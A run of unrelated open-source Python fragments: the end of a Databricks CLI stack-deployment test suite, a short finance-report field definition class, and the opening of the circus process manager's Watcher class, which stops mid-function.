res_databricks_id_1[api.JOBS_RESOURCE_JOB_ID] # TEST CASE 3: # stack_api._deploy_job should reset job if a databricks_id not given, but job with same # name found alt_test_job_settings['new_property'] = 'new_property_value' res_databricks_id_3 = stack_api._deploy_job(alt_test_job_settings) # physical job id not changed from last update assert res_databricks_id_3[api.JOBS_RESOURCE_JOB_ID] == \ res_databricks_id_2[api.JOBS_RESOURCE_JOB_ID] # TEST CASE 4 # If a databricks_id is not given but there is already multiple jobs of the same name in # databricks, an error should be raised # Add new job with different physical id but same name settings as alt_test_job_settings stack_api.jobs_client.jobs_in_databricks[123] = { api.JOBS_RESOURCE_JOB_ID: 123, 'job_settings': alt_test_job_settings } with pytest.raises(StackError): stack_api._deploy_job(alt_test_job_settings) # TEST CASE 5 # If a databricks_id is not found in workspace, then abort nonexisting_job_settings = TEST_JOB_NONEXISTING_SETTINGS nonexisting_databricks_id = { api.JOBS_RESOURCE_JOB_ID: stack_api.jobs_client.nonexisting_job_id } # Job deployment is aborted. Error message about the inconsistency should appear with pytest.raises(StackError): stack_api._deploy_job(nonexisting_job_settings, nonexisting_databricks_id) def test_deploy_workspace(self, stack_api, tmpdir): """ stack_api._deploy_workspace should call certain workspace client functions depending on object_type and error when object_type is defined incorrectly. """ test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.workspace_client.client = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output stack_api.workspace_client.import_workspace = mock.MagicMock() stack_api.workspace_client.import_workspace_dir = mock.MagicMock() test_workspace_nb_properties = TEST_WORKSPACE_NB_PROPERTIES.copy() test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_nb_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) os.makedirs( os.path.dirname(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH])) with open(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") test_workspace_dir_properties = TEST_WORKSPACE_DIR_PROPERTIES.copy() test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_dir_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) os.makedirs(test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH]) # Test Input of Workspace directory properties. dir_databricks_id = \ stack_api._deploy_workspace(test_workspace_dir_properties, None, True) stack_api.workspace_client.import_workspace_dir.assert_called_once() assert stack_api.workspace_client.import_workspace_dir.call_args[0][0] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] assert stack_api.workspace_client.import_workspace_dir.call_args[0][1] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH] assert dir_databricks_id == { api.WORKSPACE_RESOURCE_PATH: test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH]} # Test Input of Workspace notebook properties. nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) stack_api.workspace_client.import_workspace.assert_called_once() assert stack_api.workspace_client.import_workspace.call_args[0][0] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] assert stack_api.workspace_client.import_workspace.call_args[0][1] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH] assert nb_databricks_id == {api.WORKSPACE_RESOURCE_PATH: test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH]} # Test Input of Workspace notebook with html source test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.html'}) nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) assert stack_api.workspace_client.import_workspace.call_args[0][0] == 'test/notebook.html' # Test Input of Workspace notebook with dbc source test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.dbc'}) nb_databricks_id = \ stack_api._deploy_workspace(test_workspace_nb_properties, None, True) assert stack_api.workspace_client.import_workspace.call_args[0][0] == 'test/notebook.dbc' # Should raise error if resource object_type doesn't match actually is in filesystem. test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.NOTEBOOK}) with pytest.raises(StackError): stack_api._deploy_workspace(test_workspace_dir_properties, None, True) # Should raise error if object_type is not NOTEBOOK or DIRECTORY test_workspace_dir_properties.update({api.WORKSPACE_RESOURCE_OBJECT_TYPE: 'INVALID_TYPE'}) with pytest.raises(StackError): stack_api._deploy_workspace(test_workspace_dir_properties, None, True) def test_deploy_dbfs(self, stack_api, tmpdir): """ stack_api._deploy_dbfs should call certain dbfs client functions depending on object_type and error when object_type is defined incorrectly. """ test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.dbfs_client.client = mock.MagicMock() stack_api.dbfs_client.client.get_status.return_value = test_deploy_output stack_api.dbfs_client.cp = mock.MagicMock() test_dbfs_file_properties = TEST_DBFS_FILE_PROPERTIES.copy() test_dbfs_file_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_dbfs_file_properties[ api.DBFS_RESOURCE_SOURCE_PATH])}) with open(test_dbfs_file_properties[api.DBFS_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") test_dbfs_dir_properties = TEST_DBFS_DIR_PROPERTIES.copy() test_dbfs_dir_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_dbfs_dir_properties[ api.DBFS_RESOURCE_SOURCE_PATH])}) os.makedirs(test_dbfs_dir_properties[api.DBFS_RESOURCE_SOURCE_PATH]) dir_databricks_id = \ stack_api._deploy_dbfs(test_dbfs_dir_properties, None, True) assert stack_api.dbfs_client.cp.call_count == 1 assert stack_api.dbfs_client.cp.call_args[1]['recursive'] is True assert stack_api.dbfs_client.cp.call_args[1]['overwrite'] is True assert stack_api.dbfs_client.cp.call_args[1]['src'] == \ test_dbfs_dir_properties[api.DBFS_RESOURCE_SOURCE_PATH] assert stack_api.dbfs_client.cp.call_args[1]['dst'] == \ test_dbfs_dir_properties[api.DBFS_RESOURCE_PATH] assert dir_databricks_id == {api.DBFS_RESOURCE_PATH: test_dbfs_dir_properties[api.DBFS_RESOURCE_PATH]} nb_databricks_id = \ stack_api._deploy_dbfs(test_dbfs_file_properties, None, True) assert stack_api.dbfs_client.cp.call_count == 2 assert stack_api.dbfs_client.cp.call_args[1]['recursive'] is False assert stack_api.dbfs_client.cp.call_args[1]['overwrite'] is True assert stack_api.dbfs_client.cp.call_args[1]['src'] == \ test_dbfs_file_properties[api.DBFS_RESOURCE_SOURCE_PATH] assert stack_api.dbfs_client.cp.call_args[1]['dst'] == \ test_dbfs_file_properties[api.DBFS_RESOURCE_PATH] assert nb_databricks_id == {api.DBFS_RESOURCE_PATH: test_dbfs_file_properties[api.DBFS_RESOURCE_PATH]} # Should raise error if resource properties is_dir field isn't consistent with whether the # resource is a directory or not locally. test_dbfs_dir_properties.update({api.DBFS_RESOURCE_IS_DIR: False}) with pytest.raises(StackError): stack_api._deploy_dbfs(test_dbfs_dir_properties, None, True) def test_deploy_resource(self, stack_api): """ stack_api._deploy_resource should return relevant fields in output if deploy done correctly. """ # TODO(alinxie) Change this test to directly call stack_api.deploy # A job resource should have _deploy_resource call on _deploy_job stack_api._deploy_job = mock.MagicMock() test_job_databricks_id = {api.JOBS_RESOURCE_JOB_ID: 12345} stack_api._deploy_job.return_value = (test_job_databricks_id, {}) test_job_resource_status = {api.RESOURCE_DATABRICKS_ID: test_job_databricks_id} new_resource_status = stack_api._deploy_resource(TEST_JOB_RESOURCE, resource_status=test_job_resource_status) assert api.RESOURCE_ID in new_resource_status assert api.RESOURCE_DATABRICKS_ID in new_resource_status assert api.RESOURCE_SERVICE in new_resource_status stack_api._deploy_job.assert_called() assert stack_api._deploy_job.call_args[0][0] == TEST_JOB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_job.call_args[0][1] == test_job_databricks_id # A workspace resource should have _deploy_resource call on _deploy_workspace stack_api._deploy_workspace = mock.MagicMock() test_workspace_databricks_id = {api.WORKSPACE_RESOURCE_PATH: '/test/path'} stack_api._deploy_workspace.return_value = (test_workspace_databricks_id, {}) test_workspace_resource_status = {api.RESOURCE_DATABRICKS_ID: test_workspace_databricks_id} stack_api._deploy_resource(TEST_WORKSPACE_NB_RESOURCE, resource_status=test_workspace_resource_status, overwrite=True) stack_api._deploy_workspace.assert_called() assert stack_api._deploy_workspace.call_args[0][0] == \ TEST_WORKSPACE_NB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_workspace.call_args[0][1] == test_workspace_databricks_id # A dbfs resource should have _deploy_resource call on _deploy_workspace stack_api._deploy_dbfs = mock.MagicMock() stack_api._deploy_dbfs.return_value = (TEST_DBFS_FILE_DATABRICKS_ID, {}) stack_api._deploy_resource(TEST_DBFS_FILE_RESOURCE, resource_status=TEST_DBFS_FILE_STATUS, overwrite_dbfs=True) stack_api._deploy_dbfs.assert_called() assert stack_api._deploy_dbfs.call_args[0][0] == \ TEST_DBFS_FILE_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._deploy_dbfs.call_args[0][1] == \ TEST_DBFS_FILE_STATUS[api.RESOURCE_DATABRICKS_ID] # If there is a nonexistent type, raise a StackError. resource_badtype = { api.RESOURCE_SERVICE: 'nonexist', api.RESOURCE_ID: 'test', api.RESOURCE_PROPERTIES: {'test': 'test'} } with pytest.raises(StackError): stack_api._deploy_resource(resource_badtype) def test_download_workspace(self, stack_api, tmpdir): """ stack_api._download_workspace should call certain workspace client functions depending on object_type and error when object_type is defined incorrectly. """ test_deploy_output = {'test': 'test'} # default deploy_output return value stack_api.workspace_client.client = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output stack_api.workspace_client.export_workspace = mock.MagicMock() stack_api.workspace_client.export_workspace_dir = mock.MagicMock() test_workspace_nb_properties = TEST_WORKSPACE_NB_PROPERTIES.copy() test_workspace_nb_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_nb_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) test_workspace_dir_properties = TEST_WORKSPACE_DIR_PROPERTIES.copy() test_workspace_dir_properties.update( {api.WORKSPACE_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, test_workspace_dir_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH ])}) stack_api._download_workspace(test_workspace_dir_properties, True) stack_api.workspace_client.export_workspace_dir.assert_called_once() assert stack_api.workspace_client.export_workspace_dir.call_args[0][0] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_PATH] assert stack_api.workspace_client.export_workspace_dir.call_args[0][1] == \ test_workspace_dir_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] stack_api._download_workspace(test_workspace_nb_properties, True) stack_api.workspace_client.export_workspace.assert_called_once() created_dir = os.path.dirname( os.path.abspath(test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH])) assert os.path.exists(created_dir) assert stack_api.workspace_client.export_workspace.call_args[0][0] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_PATH] assert stack_api.workspace_client.export_workspace.call_args[0][1] == \ test_workspace_nb_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH] # Should raise error if object_type is not NOTEBOOK or DIRECTORY test_workspace_dir_properties.update({api.WORKSPACE_RESOURCE_OBJECT_TYPE: 'INVALID_TYPE'}) with pytest.raises(StackError): stack_api._download_workspace(test_workspace_dir_properties, True) def test_download_resource(self, stack_api): """ stack_api._download_resource should correctly call on a specific resource's download function. """ # A workspace resource should have _download_resource call on _download_workspace stack_api._download_workspace = mock.MagicMock() stack_api._download_resource(TEST_WORKSPACE_NB_RESOURCE, overwrite=True) stack_api._download_workspace.assert_called() assert stack_api._download_workspace.call_args[0][0] == \ TEST_WORKSPACE_NB_RESOURCE[api.RESOURCE_PROPERTIES] assert stack_api._download_workspace.call_args[0][1] is True # overwrite argument # If there is a nonexistent service, StackError shouldn't be raised, since it is intentional # that some resource services cannot be downloaded, like jobs. resource_badservice = { api.RESOURCE_SERVICE: 'nonexist', api.RESOURCE_ID: 'test', api.RESOURCE_PROPERTIES: {'test': 'test'} } stack_api._download_resource(resource_badservice) def test_deploy_config(self, stack_api, tmpdir): """ The stack status generated from a correctly set up stack passed through deployment in stack_api should pass the validation assertions within the deployment procedure along with passing some correctness criteria that will be tested here. """ test_deploy_output = {'test': 'test'} # Setup mocks for job resource deployment stack_api._update_job = mock.MagicMock() stack_api._update_job.return_value = 12345 stack_api._put_job = mock.MagicMock() stack_api._put_job.return_value = 12345 stack_api.jobs_client.get_job = mock.MagicMock() stack_api.jobs_client.get_job.return_value = test_deploy_output # Setup mocks for workspace resource deployment stack_api.workspace_client.import_workspace = mock.MagicMock() stack_api.workspace_client.import_workspace_dir = mock.MagicMock() stack_api.workspace_client.client.get_status = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output # Setup mocks for dbfs resource deployment stack_api.dbfs_client.cp = mock.MagicMock() stack_api.dbfs_client.client = mock.MagicMock() stack_api.dbfs_client.client.get_status.return_value = test_deploy_output # Create files and directories associated with workspace and dbfs resources to ensure # that validations within resource-specific services pass. test_stack = copy.deepcopy(TEST_STACK) for resource in test_stack[api.STACK_RESOURCES]: resource_service = resource[api.RESOURCE_SERVICE] resource_properties = resource[api.RESOURCE_PROPERTIES] curr_source_path = resource_properties.get(api.DBFS_RESOURCE_SOURCE_PATH, '') resource_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, curr_source_path)}) if resource_service == api.WORKSPACE_SERVICE: if workspace_api.NOTEBOOK == \ resource_properties[api.WORKSPACE_RESOURCE_OBJECT_TYPE]: os.makedirs(os.path.dirname(resource_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH])) with open(resource_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") if resource_properties[api.WORKSPACE_RESOURCE_OBJECT_TYPE] == \ workspace_api.DIRECTORY: os.makedirs(resource_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH]) elif resource_service == api.DBFS_SERVICE: if resource_properties[api.DBFS_RESOURCE_IS_DIR]: os.makedirs(resource_properties[api.DBFS_RESOURCE_SOURCE_PATH]) else: with open(resource_properties[api.DBFS_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") new_stack_status_1 = stack_api.deploy(test_stack) test_job_status_1 = { api.RESOURCE_ID: TEST_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_DATABRICKS_ID: {"job_id": 12345} } test_stack_status_1 = { api.STACK_NAME: "test-stack", api.CLI_VERSION_KEY: CLI_VERSION, api.STACK_DEPLOYED: [test_job_status_1, TEST_WORKSPACE_NB_STATUS, TEST_WORKSPACE_DIR_STATUS, TEST_DBFS_FILE_STATUS, TEST_DBFS_DIR_STATUS, ] } assert new_stack_status_1 == test_stack_status_1 # stack_api.deploy should create a valid stack status when given an existing # stack_status new_stack_status_2 = stack_api.deploy(test_stack, stack_status=TEST_STATUS) test_stack_status_2 = TEST_STATUS assert new_stack_status_2 == test_stack_status_2
the-stack_106_24324
from forecast.utils.query_fields import ForecastQueryFields class FigureFieldData: select_related_list = [ "financial_code", "financial_code__cost_centre", "financial_code__natural_account_code", "financial_code__programme", "financial_code__project_code", "financial_code__analysis1_code", "financial_code__analysis2_code", "financial_code__forecast_expenditure_type", ] chart_of_account_titles = [ "Cost Centre code", "Actual NAC", "Programme code", "Contract code", "Market code", "Project code", "Expenditure type", "Expenditure type description", ] def set_fields(self): # Define the access strings for the chart of account members needed # for actuals, forecasts and budgets figures self.fields = ForecastQueryFields() self.cost_centre_field = self.fields.cost_centre_code_field self.nac_field = self.fields.nac_code_field self.programme_field = self.fields.programme_code_field self.contract_field = self.fields.analysis1_code_field self.market_field = self.fields.analysis2_code_field self.project_field = self.fields.project_code_field self.expenditure_type_field = self.fields.expenditure_type_name_field self.expenditure_type_description_field = ( self.fields.expenditure_type_description_field ) self.chart_of_account_field_list = [ self.cost_centre_field, self.nac_field, self.programme_field, self.contract_field, self.market_field, self.project_field, self.expenditure_type_field, self.expenditure_type_description_field, ]
the-stack_106_24325
import copy import errno import os import signal import time import sys import operator import datetime from random import randint try: from itertools import zip_longest as izip_longest except ImportError: from itertools import izip_longest # NOQA import site from tornado import gen from psutil import NoSuchProcess, TimeoutExpired import zmq.utils.jsonapi as json from zmq.eventloop import ioloop from circus.process import Process, DEAD_OR_ZOMBIE, UNEXISTING from circus import logger from circus import util from circus.stream import get_pipe_redirector, get_stream from circus.util import parse_env_dict, resolve_name, tornado_sleep, IS_WINDOWS from circus.py3compat import bytestring, is_callable, b, PY2 class Watcher(object): """ Class managing a list of processes for a given command. Options: - **name**: name given to the watcher. Used to uniquely identify it. - **cmd**: the command to run. May contain *$WID*, which will be replaced by **wid**. - **args**: the arguments for the command to run. Can be a list or a string. If **args** is a string, it's splitted using :func:`shlex.split`. Defaults to None. - **numprocesses**: Number of processes to run. - **working_dir**: the working directory to run the command in. If not provided, will default to the current working directory. - **shell**: if *True*, will run the command in the shell environment. *False* by default. **warning: this is a security hazard**. - **uid**: if given, is the user id or name the command should run with. The current uid is the default. - **gid**: if given, is the group id or name the command should run with. The current gid is the default. - **send_hup**: if True, a process reload will be done by sending the SIGHUP signal. Defaults to False. - **stop_signal**: the signal to send when stopping the process. Defaults to SIGTERM. - **stop_children**: send the **stop_signal** to the children too. Defaults to False. - **env**: a mapping containing the environment variables the command will run with. Optional. - **rlimits**: a mapping containing rlimit names and values that will be set before the command runs. - **stdout_stream**: a mapping that defines the stream for the process stdout. Defaults to None. Optional. When provided, *stdout_stream* is a mapping containing up to three keys: - **class**: the stream class. Defaults to `circus.stream.FileStream` - **filename**: the filename, if using a FileStream - **max_bytes**: maximum file size, after which a new output file is opened. defaults to 0 which means no maximum size (only applicable with FileStream). - **backup_count**: how many backups to retain when rotating files according to the max_bytes parameter. defaults to 0 which means no backups are made (only applicable with FileStream) This mapping will be used to create a stream callable of the specified class. Each entry received by the callable is a mapping containing: - **pid** - the process pid - **name** - the stream name (*stderr* or *stdout*) - **data** - the data This is not supported on Windows. - **stderr_stream**: a mapping that defines the stream for the process stderr. Defaults to None. Optional. When provided, *stderr_stream* is a mapping containing up to three keys: - **class**: the stream class. Defaults to `circus.stream.FileStream` - **filename**: the filename, if using a FileStream - **max_bytes**: maximum file size, after which a new output file is opened. defaults to 0 which means no maximum size (only applicable with FileStream) - **backup_count**: how many backups to retain when rotating files according to the max_bytes parameter. defaults to 0 which means no backups are made (only applicable with FileStream). This mapping will be used to create a stream callable of the specified class. Each entry received by the callable is a mapping containing: - **pid** - the process pid - **name** - the stream name (*stderr* or *stdout*) - **data** - the data This is not supported on Windows. - **priority** -- integer that defines a priority for the watcher. When the Arbiter do some operations on all watchers, it will sort them with this field, from the bigger number to the smallest. (default: 0) - **singleton** -- If True, this watcher has a single process. (default:False) - **use_sockets** -- If True, the processes will inherit the file descriptors, thus can reuse the sockets opened by circusd. (default: False) - **on_demand** -- If True, the processes will be started only at the first connection to the socket (default: False) - **copy_env** -- If True, the environment in which circus is running run will be reproduced for the workers. This defaults to True on Windows as you cannot run any executable without the **SYSTEMROOT** variable. (default: False) - **copy_path** -- If True, circusd *sys.path* is sent to the process through *PYTHONPATH*. You must activate **copy_env** for **copy_path** to work. (default: False) - **max_age**: If set after around max_age seconds, the process is replaced with a new one. (default: 0, Disabled) - **max_age_variance**: The maximum number of seconds that can be added to max_age. This extra value is to avoid restarting all processes at the same time. A process will live between max_age and max_age + max_age_variance seconds. - **hooks**: callback functions for hooking into the watcher startup and shutdown process. **hooks** is a dict where each key is the hook name and each value is a 2-tuple with the name of the callable or the callabled itself and a boolean flag indicating if an exception occuring in the hook should not be ignored. Possible values for the hook name: *before_start*, *after_start*, *before_spawn*, *after_spawn*, *before_stop*, *after_stop*., *before_signal*, *after_signal* or *extended_stats*. - **options** -- extra options for the worker. All options found in the configuration file for instance, are passed in this mapping -- this can be used by plugins for watcher-specific options. - **respawn** -- If set to False, the processes handled by a watcher will not be respawned automatically. (default: True) - **virtualenv** -- The root directory of a virtualenv. If provided, the watcher will load the environment for its execution. (default: None) - **close_child_stdout**: If True, closes the stdout after the fork. default: False. - **close_child_stderr**: If True, closes the stderr after the fork. default: False. """ def __init__(self, name, cmd, args=None, numprocesses=1, warmup_delay=0., working_dir=None, shell=False, shell_args=None, uid=None, max_retry=5, gid=None, send_hup=False, stop_signal=signal.SIGTERM, stop_children=False, env=None, graceful_timeout=30.0, prereload_fn=None, rlimits=None, executable=None, stdout_stream=None, stderr_stream=None, priority=0, loop=None, singleton=False, use_sockets=False, copy_env=False, copy_path=False, max_age=0, max_age_variance=30, hooks=None, respawn=True, autostart=True, on_demand=False, virtualenv=None, close_child_stdout=False, close_child_stderr=False, dependencies=None, upgradable=False, **options): self.name = name self.use_sockets = use_sockets self.on_demand = on_demand self.res_name = name.lower().replace(" ", "_") self.numprocesses = int(numprocesses) self.warmup_delay = warmup_delay self.cmd = cmd self.args = args self._status = "stopped" self.graceful_timeout = float(graceful_timeout) self.prereload_fn = prereload_fn self.executable = None self.priority = priority self.stdout_stream_conf = copy.copy(stdout_stream) self.stderr_stream_conf = copy.copy(stderr_stream) self.stdout_stream = get_stream(self.stdout_stream_conf) self.stderr_stream = get_stream(self.stderr_stream_conf) self.stdout_redirector = self.stderr_redirector = None self.max_retry = max_retry self._options = options self.singleton = singleton self.copy_env = copy_env self.copy_path = copy_path self.virtualenv = virtualenv self.max_age = int(max_age) self.max_age_variance = int(max_age_variance) self.ignore_hook_failure = ['before_stop', 'after_stop', 'before_signal', 'after_signal', 'extended_stats'] self.respawn = respawn self.autostart = autostart self.close_child_stdout = close_child_stdout self.close_child_stderr = close_child_stderr if dependencies is None: dependencies = [] self.dependencies = dependencies self.upgradable = upgradable self.loop = loop or ioloop.IOLoop.instance() if singleton and self.numprocesses not in (0, 1): raise ValueError("Cannot have %d processes with a singleton " " watcher" % self.numprocesses) if IS_WINDOWS: if self.stdout_stream or self.stderr_stream: raise NotImplementedError("Streams are not supported" " on Windows.") if not copy_env and not env: # Copy the env by default on Windows as we can't run any # executable without some env variables # Eventually, we could set only some required variables, # such as SystemRoot self.copy_env = True self.optnames = (("numprocesses", "warmup_delay", "working_dir", "uid", "gid", "send_hup", "stop_signal", "stop_children", "shell", "shell_args", "env", "max_retry", "cmd", "args", "graceful_timeout", "executable", "use_sockets", "priority", "copy_env", "singleton", "stdout_stream_conf", "on_demand", "stderr_stream_conf", "max_age", "max_age_variance", "close_child_stdout", "close_child_stderr") + tuple(options.keys())) if not working_dir: # working dir hasn't been set working_dir = util.get_working_dir() self.working_dir = working_dir self.processes = {} self.shell = shell self.shell_args = shell_args self.uid = uid self.gid = gid if self.copy_env: self.env = os.environ.copy() if self.copy_path: path = os.pathsep.join(sys.path) self.env['PYTHONPATH'] = path if env is not None: self.env.update(env) else: if self.copy_path: raise ValueError(('copy_env and copy_path must have the ' 'same value')) self.env = env if self.virtualenv: util.load_virtualenv(self) # load directories in PYTHONPATH if provided # so if a hook is there, it can be loaded if self.env is not None and 'PYTHONPATH' in self.env: for path in self.env['PYTHONPATH'].split(os.pathsep): if path in sys.path: continue site.addsitedir(path) self.rlimits = rlimits self.send_hup = send_hup self.stop_signal = stop_signal self.stop_children = stop_children self.sockets = self.evpub_socket = None self.arbiter = None self.hooks = {} self._resolve_hooks(hooks) def _reload_hook(self, key, hook, ignore_error): hook_name = key.split('.')[-1] self._resolve_hook(hook_name, hook, ignore_error, reload_module=True) def _reload_stream(self, key, val): parts = key.split('.', 1) action = 0 if parts[0] == 'stdout_stream': old_stream = self.stdout_stream self.stdout_stream_conf[parts[1]] = val self.stdout_stream = get_stream(self.stdout_stream_conf, reload=True) if self.stdout_redirector: self.stdout_redirector.redirect = self.stdout_stream['stream'] else: self.stdout_redirector = get_pipe_redirector( self.stdout_stream, loop=self.loop) self.stdout_redirector.start() action = 1 if old_stream and hasattr(old_stream['stream'], 'close'): old_stream['stream'].close() else: old_stream = self.stderr_stream self.stderr_stream_conf[parts[1]] = val self.stderr_stream = get_stream(self.stderr_stream_conf, reload=True) if self.stderr_redirector: self.stderr_redirector.redirect = self.stderr_stream['stream'] else: self.stderr_redirector = get_pipe_redirector( self.stderr_stream, loop=self.loop) self.stderr_redirector.start() action = 1 if old_stream and hasattr(old_stream['stream'], 'close'): old_stream['stream'].close() return action def _create_redirectors(self): if self.stdout_stream: if self.stdout_redirector is not None: self.stdout_redirector.stop() self.stdout_redirector = get_pipe_redirector( self.stdout_stream, loop=self.loop) else: self.stdout_redirector = None if self.stderr_stream: if self.stderr_redirector is not None: self.stderr_redirector.stop() self.stderr_redirector = get_pipe_redirector( self.stderr_stream, loop=self.loop) else: self.stderr_redirector = None def _resolve_hook(self, name, callable_or_name, ignore_failure, reload_module=False): if is_callable(callable_or_name): self.hooks[name] = callable_or_name else: # will raise ImportError on failure self.hooks[name] = resolve_name(callable_or_name, reload=reload_module) if ignore_failure: self.ignore_hook_failure.append(name) def _resolve_hooks(self, hooks): """Check the supplied hooks argument to make sure we can find callables""" if hooks is None: return for name, (callable_or_name, ignore_failure) in hooks.items(): self._resolve_hook(name, callable_or_name, ignore_failure) @property def pending_socket_event(self): return self.on_demand and not self.arbiter.socket_event @classmethod def load_from_config(cls, config): if 'env' in config: config['env'] = parse_env_dict(config['env']) cfg = config.copy() w = cls(name=config.pop('name'), cmd=config.pop('cmd'), **config) w._cfg = cfg return w @util.debuglog def initialize(self, evpub_socket, sockets, arbiter): self.evpub_socket = evpub_socket self.sockets = sockets self.arbiter = arbiter def __len__(self): return len(self.processes) def notify_event(self, topic, msg): """Publish a message on the event publisher channel""" name = bytestring(self.res_name) multipart_msg = [b("watcher.%s.%s" % (name, topic)), json.dumps(msg)] if self.evpub_socket is not None and not self.evpub_socket.closed: self.evpub_socket.send_multipart(multipart_msg) @util.debuglog def reap_process(self, pid, status=None): """ensure that the process is killed (and not a zombie)""" if pid not in self.processes: return process = self.processes.pop(pid) timeout = 0.001 while status is None: if IS_WINDOWS: try: # On Windows we can't use waitpid as it's blocking, # so we use psutils' wait status = process.wait(timeout=timeout) except TimeoutExpired: continue else: try: _, status = os.waitpid(pid, os.WNOHANG) except OSError as e: if e.errno == errno.EAGAIN: time.sleep(timeout) continue elif e.errno == errno.ECHILD: status = None else: raise if status is None: # nothing to do here, we do not have any child # process running # but we still need to send the "reap" signal. # # This can happen if poll() or wait() were called on # the underlying process. logger.debug('reaping already dead process %s [%s]', pid, self.name) self.notify_event( "reap", {"process_pid": pid, "time": time.time(), "exit_code": process.returncode()}) process.stop() return # get return code if hasattr(os, 'WIFSIGNALED'): exit_code = 0 if os.WIFSIGNALED(status): # The Python Popen object returns <-signal> in it's returncode # property if the process exited on a signal, so emulate that # behavior here so that pubsub clients watching for reap can # distinguish between an exit with a non-zero exit code and # a signal'd exit. This is also consistent with the notify # event reap message above that uses the returncode function # (that ends up calling Popen.returncode) exit_code = -os.WTERMSIG(status) # process exited using exit(2) system call; return the # integer exit(2) system call has been called with elif os.WIFEXITED(status): exit_code = os.WEXITSTATUS(status) else: # should never happen raise RuntimeError("Unknown process exit status") else: # On Windows we don't have such distinction exit_code = status # if the process is dead or a zombie try to definitely stop it. if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): process.stop() logger.debug('reaping process %s [%s]', pid, self.name) self.notify_event("reap", {"process_pid": pid, "time": time.time(), "exit_code": exit_code}) @util.debuglog def reap_processes(self): """Reap all the processes for this watcher. """ if self.is_stopped(): logger.debug('do not reap processes as the watcher is stopped') return # reap_process changes our dict, look through the copy of keys for pid in list(self.processes.keys()): self.reap_process(pid) @gen.coroutine @util.debuglog def manage_processes(self): """Manage processes.""" if self.is_stopped(): return # remove dead or zombie processes first for process in list(self.processes.values()): if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): self.processes.pop(process.pid) if self.max_age: yield self.remove_expired_processes() # adding fresh processes if len(self.processes) < self.numprocesses and not self.is_stopping(): if self.respawn: yield self.spawn_processes() elif not len(self.processes) and not self.on_demand: yield self._stop() # removing extra processes if len(self.processes) > self.numprocesses: processes_to_kill = [] for process in sorted(self.processes.values(), key=lambda process: process.started, reverse=True)[self.numprocesses:]: if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): self.processes.pop(process.pid) else: processes_to_kill.append(process) removes = yield [self.kill_process(process) for process in processes_to_kill] for i, process in enumerate(processes_to_kill): if removes[i]: self.processes.pop(process.pid) @gen.coroutine @util.debuglog def remove_expired_processes(self): max_age = self.max_age + randint(0, self.max_age_variance) expired_processes = [p for p in self.processes.values() if p.age() > max_age] removes = yield [self.kill_process(x) for x in expired_processes] for i, process in enumerate(expired_processes): if removes[i]: self.processes.pop(process.pid) @gen.coroutine @util.debuglog def reap_and_manage_processes(self): """Reap & manage processes.""" if self.is_stopped(): return self.reap_processes() yield self.manage_processes() @gen.coroutine @util.debuglog def spawn_processes(self): """Spawn processes. """ # when an on_demand process dies, do not restart it until # the next event if self.pending_socket_event: self._status = "stopped" return for i in range(self.numprocesses - len(self.processes)): res = self.spawn_process() if res is False: yield self._stop() break yield tornado_sleep(self.warmup_delay) def _get_sockets_fds(self): # XXX should be cached if self.sockets is None: return {} fds = {} for name, sock in self.sockets.items(): fds[name] = sock.fileno() return fds def spawn_process(self): """Spawn process. Return True if ok, False if the watcher must be stopped """ if self.is_stopped(): return True if not 